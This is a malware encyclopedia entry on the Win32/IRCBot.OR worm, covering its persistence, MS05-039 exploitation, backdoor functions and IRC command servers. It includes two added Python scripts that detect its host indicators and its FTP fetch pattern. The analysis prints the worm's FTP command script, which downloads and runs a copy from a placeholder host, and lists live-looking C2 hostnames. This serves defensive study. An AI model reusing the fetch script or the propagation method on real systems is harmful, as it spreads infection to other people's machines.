Threat Encyclopedia


Win32/IRCBot.OR

Aliases: IRCBot.et, W32/Sdbot.worm!51326, WORM_ZOTOB.D, W32.Zotob.G, Win32.Drugtob.A, W32/Sdbot-ACI
Type: IRC Worm
Affects: 32-bit Windows

IRCBot.OR is a 51326 byte worm that exploits a PnP vulnerability to infiltrate its host. The worm is runtime protected by Yoda and packed by UPX. On Windows 2000 systems the worm replicates and installs a bot as a payload. On other 32-bit systems the malware does not replicate but the bot is fully functional.

Upon execution, the worm copies itself into the "%System%\wbev" folder as "windrg32.exe", creating the "wbev" folder if it does not already exist. After a successful copy the worm deletes the original file.

The worm creates a mutex "windrg322" to avoid multiple running instances of itself on one machine.

The worm adds the following registry value to make sure that it runs every time Windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WinDrg32" = "%System%\wbev\windrg32.exe"
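The three host-side indicators given so far (the Run value, the dropped file and the mutex) are the ones an incident responder would check first. The following Python is an added example of such a check, not code from the write-up or its author: the host snapshots it inspects are constructed inline, and the snapshot format and the default system directory are assumptions.

```python
"""Check a host snapshot for the Win32/IRCBot.OR persistence indicators
named in the write-up: the Run value, the dropped file and the mutex.

Added example; the snapshots below are constructed, not captured from a
real host. On a live Windows machine the same three inputs would come
from the registry, the file system and a mutex listing (collection step
assumed, not shown)."""

import ntpath
import re

# Indicators taken from the write-up.
RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "WinDrg32"
DROPPED_FILE = r"wbev\windrg32.exe"      # relative to %System%
MUTEX_NAME = "windrg322"

# Matches the dropped file wherever %System% actually resolves.
_DROP_RE = re.compile(r"\\wbev\\windrg32\.exe$", re.IGNORECASE)


def check_run_values(run_values):
    """run_values: {value_name: value_data} read from RUN_KEY.
    Flags the worm's own value name, and also any value whose data points
    at the dropped file in case a variant renames the value."""
    hits = []
    for name, data in run_values.items():
        if name.lower() == RUN_VALUE_NAME.lower():
            hits.append(f"{RUN_KEY}\\{name}: value name matches")
        elif _DROP_RE.search(data.strip('"')):
            hits.append(f"{RUN_KEY}\\{name}: launches {data!r}")
    return hits


def check_files(existing_paths, system_dir=r"C:\WINDOWS\system32"):
    """existing_paths: iterable of file paths present on the host.
    system_dir is an assumed default; pass the real %System% value."""
    expected = ntpath.join(system_dir, DROPPED_FILE).lower()
    return [p for p in existing_paths if p.lower() == expected]


def check_mutexes(mutex_names):
    return [m for m in mutex_names if m == MUTEX_NAME]


def assess(snapshot):
    """snapshot: {'run': {...}, 'files': [...], 'mutexes': [...]}.
    Returns a list of human-readable findings; an empty list means no
    indicator was found."""
    findings = []
    findings += check_run_values(snapshot.get("run", {}))
    findings += [f"dropped file present: {p}"
                 for p in check_files(snapshot.get("files", []))]
    findings += [f"mutex present: {m}"
                 for m in check_mutexes(snapshot.get("mutexes", []))]
    return findings


# Constructed snapshots for demonstration.
CLEAN_HOST = {
    "run": {"ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe"},
    "files": [r"C:\WINDOWS\system32\ctfmon.exe"],
    "mutexes": ["ShimCacheMutex"],
}

INFECTED_HOST = {
    "run": {
        "ctfmon.exe": r"C:\WINDOWS\system32\ctfmon.exe",
        "WinDrg32": r"C:\WINDOWS\system32\wbev\windrg32.exe",
    },
    "files": [r"C:\WINDOWS\system32\wbev\windrg32.exe"],
    "mutexes": ["windrg322"],
}

if __name__ == "__main__":
    for label, snap in (("clean", CLEAN_HOST), ("infected", INFECTED_HOST)):
        print(label, assess(snap) or ["no indicators"])
```

The value-data check is deliberately looser than the value-name check: the name "WinDrg32" is trivial for a variant to change, while the launch path is what the persistence actually depends on.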

The worm generates random IP addresses and attempts to connect to port 445 on each of them to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx]. If the exploit succeeds, it executes code (shellcode) on the target machine that instructs it to connect back to the source and retrieve a copy of the worm. The copy is transferred over a connection to the FTP server that the worm sets up, driven by FTP commands stored in a file called "inst"; the worm creates its own task for this purpose. The "inst" file contains the following FTP commands:

open %IP% %TCP port%
a
b
bin
get run{number}.exe
bye

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of Win32/IRCBot.OR under the name "run{number}.exe" and starts this file after downloading. {number} represents a numeric character.
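A defender who sees ftp.exe being driven by a script file can parse that script to recognise this fetch pattern and extract the address to block. The following Python is an added detection example, not code from the write-up or its author; the two sample scripts are constructed, with the documentation address 192.0.2.10 and port 1234 standing in for the %IP% and %TCP port% placeholders.

```python
"""Parse an ftp.exe command script of the kind IRCBot.OR writes to "inst"
and decide whether it reproduces the worm's download pattern.

Added detection example, not code from the write-up. The sample scripts
are constructed; 192.0.2.10 (a documentation address) and port 1234
stand in for the %IP% and %TCP port% placeholders."""

import re
from dataclasses import dataclass, field
from typing import List, Optional

_OPEN_RE = re.compile(r"^open\s+(\S+)\s+(\d{1,5})$", re.IGNORECASE)
_GET_RE = re.compile(r"^get\s+(\S+)$", re.IGNORECASE)
# "run{number}.exe" with a single numeric character, as the write-up states.
_WORM_FILE_RE = re.compile(r"^run\d\.exe$", re.IGNORECASE)


@dataclass
class FtpFetch:
    host: Optional[str] = None
    port: Optional[int] = None
    filename: Optional[str] = None
    credentials: List[str] = field(default_factory=list)
    binary_mode: bool = False


def parse_ftp_script(text: str) -> Optional[FtpFetch]:
    """Return the transfer described by the script, or None if the script
    does not both open a connection and fetch a file."""
    fetch = FtpFetch()
    for raw in text.splitlines():
        ln = raw.strip()
        if not ln:
            continue
        m = _OPEN_RE.match(ln)
        if m:
            fetch.host, fetch.port = m.group(1), int(m.group(2))
        elif ln.lower() in ("bin", "binary"):
            fetch.binary_mode = True
        elif (m := _GET_RE.match(ln)):
            fetch.filename = m.group(1)
        elif ln.lower() in ("bye", "quit"):
            break
        elif fetch.host is not None and fetch.filename is None and not fetch.binary_mode:
            # Unrecognised lines directly after "open" are the answers
            # ftp.exe feeds to the user/password prompts ("a" and "b"
            # in the worm's script).
            fetch.credentials.append(ln)
    return fetch if fetch.host and fetch.filename else None


def matches_ircbot_or(fetch: Optional[FtpFetch]) -> bool:
    """True when the script follows the worm's "inst" layout: two
    throw-away login lines, binary mode and a run{number}.exe download."""
    return (fetch is not None
            and fetch.binary_mode
            and len(fetch.credentials) == 2
            and _WORM_FILE_RE.match(fetch.filename) is not None)


def describe(text: str) -> str:
    """One-line verdict naming the source host if the pattern matches."""
    fetch = parse_ftp_script(text)
    if matches_ircbot_or(fetch):
        return f"IRCBot.OR fetch pattern: {fetch.filename} from {fetch.host}:{fetch.port}"
    return "no match"


# Constructed sample in the worm's "inst" layout.
WORM_STYLE_SCRIPT = """open 192.0.2.10 1234
a
b
bin
get run7.exe
bye
"""

# Constructed benign script: an ordinary anonymous text-file download.
BENIGN_SCRIPT = """open ftp.example.net 21
anonymous
user@example.net
ascii
get README.txt
quit
"""

if __name__ == "__main__":
    print(describe(WORM_STYLE_SCRIPT))
    print(describe(BENIGN_SCRIPT))
```

The parser keeps the host and port even when the worm-specific check fails, so the same routine can feed a broader rule such as "ftp.exe fetching any .exe from a non-standard port" without re-parsing.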

The worm enumerates the following folders and tries to delete these files if they are present there:

%SYSTEM%\pnpsrv.exe
%SYSTEM%\winpnp.exe
%SYSTEM%\csm.exe
%SYSTEM%\botzor.exe

And

%PROGRAMFILES%\MyWebSearch
%PROGRAMFILES%\MyWebSearch\*.exe
%PROGRAMFILES%\Hotbar
%PROGRAMFILES%\Hotbar\*.exe
%PROGRAMFILES%\MyWay
%PROGRAMFILES%\MyWay\*.exe
%PROGRAMFILES%\180Solutions
%PROGRAMFILES%\180Solutions\*.exe
%PROGRAMFILES%\Common Files\WinTools
%PROGRAMFILES%\Common Files\WinTools\*.exe
%PROGRAMFILES%\Toolbar
%PROGRAMFILES%\Toolbar\*.exe
%PROGRAMFILES%\CxtPls
%PROGRAMFILES%\NavExcel
%PROGRAMFILES%\AutoUpdate
%PROGRAMFILES%\AutoUpdate\AutoUpdate.exe
%PROGRAMFILES%\EbatesMoeMoneyMaker
%PROGRAMFILES%\eZula
%PROGRAMFILES%\eZula\mmod.exe
%PROGRAMFILES%\Common Files\GMT
%PROGRAMFILES%\Common Files\GMT\GMT.exe
%PROGRAMFILES%\Common Files\CMEII

The worm scans the registry locations HKLM\Software\Microsoft\Windows\Run, and HKLM\Software\Microsoft\Windows\RunOnce for the following keys:

"Windows PNP Server"
"Windows PNP"
"csm Win Updates"
"MyWebSearch"
"WINDOWS SYSTEM"
"Zotob"
"MyWay"
"WeatherOnTray"
"Apropos"
"IBIS TB"
"TBPS"
"Toolbar"
"Hotbar"
"CMESys"
"NavExcel"
"ViewMgr"
"eZula"
"EbatesMoeMoneyMaker"
"Ebates"
"AutoUpdater"
"Gator"
"Trickler"
"QuickTime"
"GatorDownloader"
"eZmmod"
"Viewpoint"
"TkBellExe"
"180"
"WinTools"
"Real"
"QuickTime Task"
"sais"
"msbb"
"saie"
"180ax"
"lgbibsn"
"tov"

All matching keys in these locations are deleted to prevent other malicious files from running at start-up. Previous Mytob and Zotob variants watch the registry and recreate the deleted keys. To prevent this behaviour the worm tries to terminate the following processes if present:

pnpsrv.exe, winpnp.exe, csm.exe, EbatesMoeMoneyMaker*.exe, botzor.exe, CxtPls.exe, NHUpdater.exe, ViewMgr.exe, realsched.exe, qttask.exe, CMESys.exe

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components
Google via a special bot plugin
Reading and sending emails via www.mailinator.com

IRCBot.OR also makes use of the tinyurl.com functionality, and to determine whether it has Internet connectivity it tries to connect to the following Internet servers:

www.google.com
www.ebay.com
www.yahoo.com

It also tries to connect to the following IRC servers:

xaeti.m00p.org
db23a.hack-syndicate.org
spookystreet.m00p.org
spookystreet.udp-flood.com

References:

http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx

History: Analysis and Write-up by: Michael St. Neitzel